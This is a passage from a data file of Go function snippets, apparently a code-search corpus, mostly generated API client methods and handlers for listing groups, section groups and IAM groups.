err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfSectionGroup\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func (op *ListOp) NotGroupID(val string) *ListOp {\n\tif op != nil {\n\t\top.QueryOpts.Set(\"not_group_id\", val)\n\t}\n\treturn op\n}", "func newRouteGroups(c *ZalandoV1Client, namespace string) *routeGroups {\n\treturn &routeGroups{\n\t\tclient: c.RESTClient(),\n\t\tns: namespace,\n\t}\n}", "func NewGetGroupMembersListPublicV1NotFound() *GetGroupMembersListPublicV1NotFound {\n\treturn &GetGroupMembersListPublicV1NotFound{}\n}", "func (a *MeOnenoteSectionsNotebookApiService) MeOnenoteSectionsParentNotebookSectionGroupsListSectionGroups(ctx _context.Context, onenoteSectionId string, sectionGroupId string, localVarOptionals *MeOnenoteSectionsParentNotebookSectionGroupsListSectionGroupsOpts) (CollectionOfSectionGroup, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfSectionGroup\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/me/onenote/sections({onenoteSection-id})/parentNotebook/sectionGroups({sectionGroup-id})/sectionGroups\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenoteSection-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenoteSectionId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"sectionGroup-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", sectionGroupId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfSectionGroup\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func handleGetGroups(c *Context, w http.ResponseWriter, r *http.Request) {\n\tpaging, err := parsePaging(r.URL)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to parse paging parameters\")\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\twithInstallationCount, err := parseBool(r.URL, model.ShowInstallationCountQueryParameter, false)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to parse request parameters\")\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tfilter := &model.GroupFilter{\n\t\tPaging: paging,\n\t\tWithInstallationCount: withInstallationCount,\n\t}\n\n\tgroups, err := c.Store.GetGroupDTOs(filter)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to query groups\")\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\tif groups == nil {\n\t\tgroups = []*model.GroupDTO{}\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\toutputJSON(c, w, groups)\n}", "func (client IdentityClient) ListDynamicGroups(ctx context.Context, request ListDynamicGroupsRequest) (response ListDynamicGroupsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.listDynamicGroups, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = ListDynamicGroupsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = ListDynamicGroupsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(ListDynamicGroupsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into ListDynamicGroupsResponse\")\n\t}\n\treturn\n}", "func (rm *resourceManager) newListRequestPayload(\n\tr *resource,\n) (*svcsdk.DescribeReplicationGroupsInput, error) {\n\tres := &svcsdk.DescribeReplicationGroupsInput{}\n\n\tif r.ko.Spec.ReplicationGroupID != nil {\n\t\tres.SetReplicationGroupId(*r.ko.Spec.ReplicationGroupID)\n\t}\n\n\treturn res, nil\n}", "func GetMissingSecGroup(sliceSource, sliceToInspect []models.SecurityGroupFields) []models.SecurityGroupFields {\n\telementsNotFound := make([]models.SecurityGroupFields, 0)\n\tfor _, elt := range sliceSource {\n\t\tif !containsSecGroup(sliceToInspect, elt) {\n\t\t\telementsNotFound = append(elementsNotFound, elt)\n\t\t}\n\t}\n\treturn elementsNotFound\n}", "func NewQueryUserGroupsDefault(code int) *QueryUserGroupsDefault {\n\treturn &QueryUserGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func GetNonMemberGroupsHandler(c *gin.Context) {\n\tphonenr := c.Param(\"number\")\n\tnumber, _ := strconv.Atoi(phonenr)\n\tvar groups = GetNonMemberGroups(number)\n\tc.JSON(http.StatusAccepted, groups)\n}", "func NewListByPathNotFound(body *ListByPathNotFoundResponseBody) *goa.ServiceError {\n\tv := &goa.ServiceError{\n\t\tName: *body.Name,\n\t\tID: *body.ID,\n\t\tMessage: *body.Message,\n\t\tTemporary: *body.Temporary,\n\t\tTimeout: *body.Timeout,\n\t\tFault: *body.Fault,\n\t}\n\n\treturn v\n}", "func NewListByPathNotFound(body *ListByPathNotFoundResponseBody) *goa.ServiceError {\n\tv := &goa.ServiceError{\n\t\tName: *body.Name,\n\t\tID: *body.ID,\n\t\tMessage: *body.Message,\n\t\tTemporary: *body.Temporary,\n\t\tTimeout: *body.Timeout,\n\t\tFault: *body.Fault,\n\t}\n\n\treturn v\n}", "func NewAddNamespaceToGroupNotFound() *AddNamespaceToGroupNotFound {\n\n\treturn &AddNamespaceToGroupNotFound{}\n}", "func (a *GroupsOnenotePagesNotebookApiService) GroupsOnenotePagesParentNotebookSectionsParentSectionGroupListSectionGroups(ctx _context.Context, groupId string, onenotePageId string, onenoteSectionId string, localVarOptionals *GroupsOnenotePagesParentNotebookSectionsParentSectionGroupListSectionGroupsOpts) (CollectionOfSectionGroup, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfSectionGroup\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/groups({group-id})/onenote/pages({onenotePage-id})/parentNotebook/sections({onenoteSection-id})/parentSectionGroup/sectionGroups\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenotePage-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenotePageId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenoteSection-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenoteSectionId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfSectionGroup\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func NewGetSystemObjectDefinitionsByIDAttributeGroupsNotFound() *GetSystemObjectDefinitionsByIDAttributeGroupsNotFound {\n\treturn &GetSystemObjectDefinitionsByIDAttributeGroupsNotFound{}\n}", "func (a *SitesOnenotePagesNotebookApiService) SitesOnenotePagesParentNotebookSectionGroupsListSectionGroups(ctx _context.Context, siteId string, onenotePageId string, sectionGroupId string, localVarOptionals *SitesOnenotePagesParentNotebookSectionGroupsListSectionGroupsOpts) (CollectionOfSectionGroup, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfSectionGroup\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/sites({site-id})/onenote/pages({onenotePage-id})/parentNotebook/sectionGroups({sectionGroup-id})/sectionGroups\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"site-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", siteId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenotePage-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenotePageId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"sectionGroup-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", sectionGroupId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfSectionGroup\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func NewGetHostGroupsBadRequest() *GetHostGroupsBadRequest {\n\treturn &GetHostGroupsBadRequest{}\n}", "func findHostGroups(hg *defs, td *defs, hOffset hostOffset) hostgroupOffset {\n hgrpOffset := newHostGroupOffset()\n hostnameExcl := \"!\"+hOffset.GetHostName()\n for idx,def := range *hg {\n if def.attrExist(\"members\"){\n if def[\"members\"].RegexHas(hOffset.GetHostName()) && !hgrpOffset.members.Has(idx) {\n hgrpOffset.members.Add(idx)\n findHostGroupMembership(hg, idx, *hgrpOffset)\n } else if def[\"members\"].Has(hostnameExcl) && !hgrpOffset.membersExcl.Has(idx) {\n hgrpOffset.membersExcl.Add(idx)\n }\n }\n }\n // hostgroups from host obj definition(include host template)\n for _, hgrp := range hOffset.GetEnabledHostgroupsName(){\n hgrp := strings.TrimLeft(hgrp,\"+\")\n findHostGroupMembership(hg, hgrp, *hgrpOffset)\n }\n // set enabled hostgroups\n (*hgrpOffset).SetEnabledDisabledHostgroups()\n // add hostgroups extracted from host obj definition to hostgroups list in the hostgroupOffset\n hOffset.SetEnabledHostgroups(hgrpOffset)\n return *hgrpOffset\n}", "func TestListIamGroups(t *testing.T) {\n\tt.Parallel()\n\n\tregion, err := getRandomRegion()\n\trequire.NoError(t, err)\n\n\tlocalSession, err := session.NewSession(&awsgo.Config{\n\t\tRegion: awsgo.String(region),\n\t})\n\trequire.NoError(t, err)\n\n\tgroupNames, err := getAllIamGroups(localSession, time.Now(), config.Config{})\n\trequire.NoError(t, err)\n\tassert.NotEmpty(t, groupNames)\n}", "func (a *IAMApiService) GetGroups(ctx context.Context) (IamGroups, *http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = http.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue IamGroups\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/acs/api/v1/groups\"\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 200 {\n\t\t\tvar v IamGroups\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 0 {\n\t\t\tvar v IamError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHttpResponse, nil\n}", "func (a *GroupsOnenotePagesOnenoteSectionApiService) GroupsOnenotePagesParentSectionParentNotebookSectionGroupsListSectionGroups(ctx _context.Context, groupId string, onenotePageId string, sectionGroupId string, localVarOptionals *GroupsOnenotePagesParentSectionParentNotebookSectionGroupsListSectionGroupsOpts) (CollectionOfSectionGroup, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfSectionGroup\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := 